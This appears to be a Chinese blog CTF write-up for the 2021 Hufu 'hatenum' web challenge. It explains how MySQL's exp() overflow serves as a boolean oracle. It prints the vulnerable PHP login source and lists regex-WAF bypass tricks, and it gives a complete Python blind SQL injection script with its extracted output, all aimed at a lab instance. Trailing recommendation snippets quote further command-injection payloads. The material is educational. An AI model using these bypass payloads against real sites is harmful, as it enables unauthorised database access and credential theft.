2021-虎符网络安全赛道-hatenum | exp()函数与正则过滤

最新推荐文章于 2023-07-06 17:11:55 发布
最新推荐文章于 2023-07-06 17:11:55 发布
阅读量1.1k 收藏 2
点赞数 4
分类专栏: web 文章标签: web安全 数据库 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55793759/article/details/127078074
版权

这个题目很有意思,值得去复现一下

一、exp( )函数

1、MySQL中的exp()函数用于将E提升为指定数字X的幂,这里E(2.718281 …)是自然对数的底数,exp()函数在sql注入里面exp函数一般被用做报错注入(mysql<5.5.53)里面输出报错信息

2、这里注入利用的是Double溢出,exp(x) 含义为e的x次方,当x>709时就超过了double的取值范围造成报错输出

3、我们可以用 ~ 运算符按位取反的方式得到一个最大值,该运算符也可以处理一个字符串,经过其处理的字符串会变成大一个很大整数足以超过 Double 数组范围,从而报错输出

二、过程

🍺一个登录表单

在这里插入图片描述

🍺给出了源码,查看一下源码

<?php
error_reporting(0);
session_start();
class User{
	public $host = "localhost";
	public $user = "root";
	public $pass = "123456";
	public $database = "ctf";
	public $conn;
	function __construct(){
		$this->conn = new mysqli($this->host,$this->user,$this->pass,$this->database);
		if(mysqli_connect_errno()){
			die('connect error');
		}
	}
	function find($username){
		$res = $this->conn->query("select * from users where username='$username'");
		if($res->num_rows>0){
			return True;
		}
		else{
			return False;
		}

	}
	function register($username,$password,$code){
		if($this->conn->query("insert into users (username,password,code) values ('$username','$password','$code')")){
			return True;
		}
		else{
			return False;
		}
	}
	function login($username,$password,$code){
		$res = $this->conn->query("select * from users where username='$username' and password='$password'");
		if($this->conn->error){
			return 'error';
		}
		else{
			$content = $res->fetch_array();
			if($content['code']===$_POST['code']){
				$_SESSION['username'] = $content['username'];
				return 'success';
			}
			else{
				return 'fail';
			}
		}

	}
}

function sql_waf($str){
	if(preg_match('/union|select|or|and|\'|"|sleep|benchmark|regexp|repeat|get_lock|count|=|>|<| |\*|,|;|\r|\n|\t|substr|right|left|mid/i', $str)){
		die('Hack detected');
	}
}

function num_waf($str){
	if(preg_match('/\d{9}|0x[0-9a-f]{9}/i',$str)){
		die('Huge num detected');
	}
}

function array_waf($arr){
	foreach ($arr as $key => $value) {
		if(is_array($value)){
			array_waf($value);
		}
		else{
			sql_waf($value);
			num_waf($value);
		}
	}
}

🍺1、主要是正则表达过滤

绕过账号密码检测

username=admin
password=||1#
select * from users where username='admin' and password='||1#'

针对code的检测,看下sql_waf, 因为返回的内容有限,所以只能使用布尔盲注

🍺2、盲注通常会用到几个关键关键字:字符串截取类(substr)、条件判断类(if)、语句分割类(空格、/**/)、逻辑运算类(and、or)

字符串截取类

禁用:substr、left、right、mid

绕过: like、rlike、instr

其中like与rlike的区别是 rlike支持正则表达式,而like只支持如%,_等有限的通配符,like可以近似于"="

语句分割

禁用: 空格、r(%0d)、n(%0a)、t(%09)、/**/

语句之间分割常常使用空格

绕过: %a0(&nbsp)、%0b(垂直制表符)、%0c(换页符)

逻辑运算

禁用: and、or、=、>、<、regexp

绕过: &&、||、 like、greatest、least

条件判断

禁用: 因为禁用了,,所以if 语句没发使用

🍺3、exp()函数除了能用在报错注入以外,利用exp在参数大于709时会报错的特性可以用来构造条件判断语句

||exp(710-(... rlike ...))

即如果 (... rlike ...) 中的语句执行匹配后的结果为True,经过减号转换后为 exp(710-1) 后不会溢出;若为false,转换为 exp(710-0) 后则会溢出并报错

🍺4、有了前面所有的绕过,就能构造语句进行code值注入了,可以判断code 长度,进而猜解code字段具体值

因为' 被过滤,所以rlike后面不能出现字符串,需要 将正则表达式 ^xxx 转换成十六进制

同时num_waf 有个判断十六进制位数不能超过9位,既字符串不能超过4位(一个字母对应2个十六进制数),所以在包含正则^以外的字符串超过3位时需要不断做替换,用3位字符串去匹配下一位

🍺代码

import requests as r
import string

url = "http://29d68ff8-0fbd-47e4-9de4-3702f4bb7a55.node4.buuoj.cn:81"
pt = string.ascii_letters+string.digits+"$"
# string.ascii_letters 所有字母  string.digits 所有数字


def str2hex(raw):
    ret = '0x'
    for i in raw:
    
        # ord 返回对应的ASCII数值,hex 返回16进制数,以字符串形式表示,rjust返回一个长度为2的字符串,不够用0替补
        # 转换16进制,16进制在数据库执行查询时又默认转换成字符串
        ret += hex(ord(i))[2:].rjust(2,'0')
    return ret

ans = ""
tmp = "^"

for i in range(24):
    for ch in pt:

        payload = f"||1 && username rlike 0x61646d && exp(710-(code rlike binary {str2hex(tmp+ch)}))#"

        payload = payload.replace(' ',  chr(0x0c)) # 0c 换页键

        data = {
            "username":"eki\\",
            "password":payload,
            "code":"1"
        }

        req = r.post(url+"/login.php",data=data,allow_redirects=False) 
        # 其实allow_redirects默认是True,所以是默认跳转

        if 'fail' in req.text:
            ans += ch
            print(tmp+ch,ans)
            if len(tmp) == 3:
                tmp = tmp[1:]+ch
            else:
                tmp += ch

            break

'''
^e e
^er er
^erg erg
ergh ergh
rghr erghr     
ghru erghru
hrui erghrui
ruig erghruig
uigh erghruigh
igh2 erghruigh2       
gh2u erghruigh2u
h2uy erghruigh2uy
2uyg erghruigh2uyg
uygh erghruigh2uygh
ygh2 erghruigh2uygh2
gh2u erghruigh2uygh2u
h2uy erghruigh2uygh2uy
2uyg erghruigh2uygh2uyg
uygh erghruigh2uygh2uygh     
'''

rev_ans = ""
tmp = "$"

for i in range(24):
    for ch in pt:

        payload = f"||1 && username rlike 0x61646d && exp(710-(code rlike binary {str2hex(ch+tmp)}))#"
        #print(payload)

        payload = payload.replace(' ',chr(0x0c))

        data = {
            "username":"eki\\",
            "password":payload,
            "code":"1"
        }

        req = r.post(url+"/login.php",data=data,allow_redirects=False)

        if 'fail' in req.text:
            rev_ans = ch+rev_ans
            print(ch+tmp,rev_ans)
            if len(tmp) == 3:
                tmp = ch+tmp[:-1]
            else:
                tmp = ch+tmp

            break

'''
g$ g
ig$ ig
2ig$ 2ig
32ig 32ig
u32i u32ig
iu32 iu32ig
uiu3 uiu32ig
3uiu 3uiu32ig
23ui 23uiu32ig
h23u h23uiu32ig
gh23 gh23uiu32ig
igh2 igh23uiu32ig
uigh uigh23uiu32ig
ruig ruigh23uiu32ig
hrui hruigh23uiu32ig
ghru ghruigh23uiu32ig
rghr rghruigh23uiu32ig
ergh erghruigh23uiu32ig
'''

data = {
    "username":"admin\\",
    "password":"||1#",
    "code":"erghruigh2uygh23uiu32ig"
}

req = r.post(url+"/login.php",data=data)

print(req.text)

代码运行

在这里插入图片描述
直接解出flag

迷途羔羊pro
关注
  • 4
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
10-27
虎符科技网络安全通信服务三种解决方案推选PPT文档.ppt
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static.zip
最新发布
04-22
2022数字中国创新大赛虎符网络安全赛道 初赛4道赛题 vdq-mva-fpbe-static
java运行时添加枚举值_枚举-我可以在运行时在J中添加和删除枚举元素吗
weixin_31354669的博客
02-26 289
我在年轻职业的形成性项目中就遇到了这个问题。我采用的方法是在外部保存枚举的值和名称,最终目标是能够编写看起来尽可能接近语言枚举的代码。我希望我的解决方案如下所示:enum HatType{BASEBALL,BRIMLESS,INDIANA_JONES}HatType mine = HatType.BASEBALL;// prints "BASEBALL"System.out.println(min...
[HFCTF 2021 Final]tinypng
weixin_45751765的博客
04-01 2658
0x00 前言 seebug复习一下phar在php反序列化中的利用 参考https://paper.seebug.org/680/ 写的太好了… 直接粘了 phar文件会以序列化的形式存储用户自定义的meta-data这一特性拓展了php反序列化的攻击面 phar文件结构 stub 类似标志,格式为xxx<?php xxx; __HALT_COMPILER();?>前面内容不限,但必须以__HALT_COMPILER();?>来结尾,否则phar扩展将无法识别这个文件为phar文件 m
4 复合类型
kking_edc的博客
04-08 133
10 数组的替代品 10.1 模板类vector 模板类vector类似于string类,也是一种动态数组。我们可以在运行阶段设置vector对象的长度,可在末尾附加新数据,还可在中间插入新数据。基本上,它是使用new创建动态数组的替代品。实际上,vector类确实使用new和delete来管理内存,但这种工作是自动完成的。 首先,要使用vector对象,必须包含头文件vector。其次,vector包含在名称空间std中,因此我们可以使用using编译指令、using声明或std::vector。第三,模
solidity 学习笔记
nina_1314521的博客
03-31 1561
/ 智能合约的许可协议// 智能合约的适用版本import "";// 导入// 状态变量// 函数// 智能合约的许可协议// 智能合约的适用版本import "";// 导入// 状态变量// 函数
[HFCTF 2021] final web复现
weixin_63231007的博客
07-06 613
flasksession伪造&pickle反序列化 + Laravel&phar反序列化 + exp()溢出盲注
JavaWEB
Hate Bugs
12-17 444
HTML html代码示例 <html> <title> //这里表示网页的标题 Here We GO !!! </title> //这里设置的是浏览器解析网页时的编码格式 <meta charset="utf-8" /> //设置网页文字的颜色 <body text="#0000ff" >
CTFHUB-密码口令
cainiao17441898的博客
03-13 346
CTFHUB-弱口令 这题就正常用burpsuit抓包,爆破。导入字典就行了。 CTFHUB-默认口令 常见网络安全设备默认口令在这 文章目录CTFHUB-弱口令CTFHUB-默认口令总结 `` 总结
CTFHub 命令注入-综合练习
qq_56096156的博客
03-21 856
1.因为运算符被过滤掉了,我们先用分号测试一下命令是否执行;2.接下来我们用cat命令查看flag文件。发现可以执行,并且找到了flag文件。然后右键查看网页源代码,找到hub.
HFCTF2021复现
as you know, nlp is fantasitc!
03-16 1104
[HFCTF2021 Quals]Unsetme 1、F3框架,unset将参数a拼接进去,可以闭合 2、测试 ​ payload ?a=a%0a);%0aphpinfo( 3、读取flag ?a=a%0a);%0aecho file_get_contents(%27/flag%27 [HFCTF 2021 Final]easyflask 1、源码,很明显的pickle反序列化 pickle官方文档 #!/usr/bin/python3.6 import os import pickle fro
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的.pdf
09-18
新锐 _ 虎符网络王伟alert7:人总是要挑战下自己的 安全管理 安全意识教育 端点安全 数据分析 云安全
精美清明节介绍PPT模板.zip
07-15
清明节又叫踏青节,在仲春与暮春之交,也就是冬至后的第108天。是中国传统节日,也是最重要的祭祀节日之一,是祭祖和扫墓的日子。中华民族传统的清明节大约始于周代,距今已有二千五百多年的历史。 《历书》:...
虎符2020CTF web easylogin.pdf
04-20
虎符2020CTF web easylogin的wp,个人见解,还附上大佬的wp,免费提供给大家,我是难的又打字,所有就用PDF格式当作资源上传
Java中的枚举
286
04-24 310
        Enum(“枚举”)全称为 enumeration, 是 JDK 1.5  中引入的新特性,在Java开发者眼中枚举已经是再普通不过的一种类型了,可以说任何Java程序员都编写过自己的枚举类,一般这些枚举类用来表示同一类属性,如:  /** * @Description 操作系统类型 * @author ming.li * @Date 2018年4月16日 下午2...
第14章-结构和其他数据形式
itzyjr的专栏
10-19 361
建立结构声明: struct book { char title[MAXTITL]; char author[MAXAUTL]; float value; }; 把library声明为一个使用book结构布局的结构变量: struct book library; 定义结构变量: 结构有两层含义。一层含义是“结构布局”,刚才已经讨论过了。结构布局告诉编译器如何表...
2021数字中国创新大赛虎符网络安全赛-Writeup
末初的CSDN博客
04-04 4792
文章目录Web签到unsetme“慢慢做”管理系统Misc你会日志分析吗sectraffic Web 签到 http://cn-sec.com/archives/313267.html User-Agentt: zerodiumsystem("cat /flag"); unsetme 这题先放着 /?a=:[]);eval($_GET[1]);//&1=system(%27cat%20/flag%27); “慢慢做”管理系统 根据题目提示,这里第一步登录应该利用一些字符串被md5
史上最全的CTFHUB弱口令+默认口令解题过程
m0_75235064的博客
11-18 2621
读万卷书,行万里路......
ctfhub技能书+历年真题学习笔记(详解)
热门推荐
qq_50589021的博客
03-30 6万+
Web Web前置技能 HTTP协议 请求方式 题目: HTTP Method is GET Use CTF**B Method, I will give you flag. Hint: If you got 「HTTP Method Not Allowed」 Error, you should request index.php. 意思就是你是get请求,你把这个请求换成CTFHUB就行 所以抓包直接一把梭 302跳转 题目: No Flag here! Give me Flag 点击发现没有跳转

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值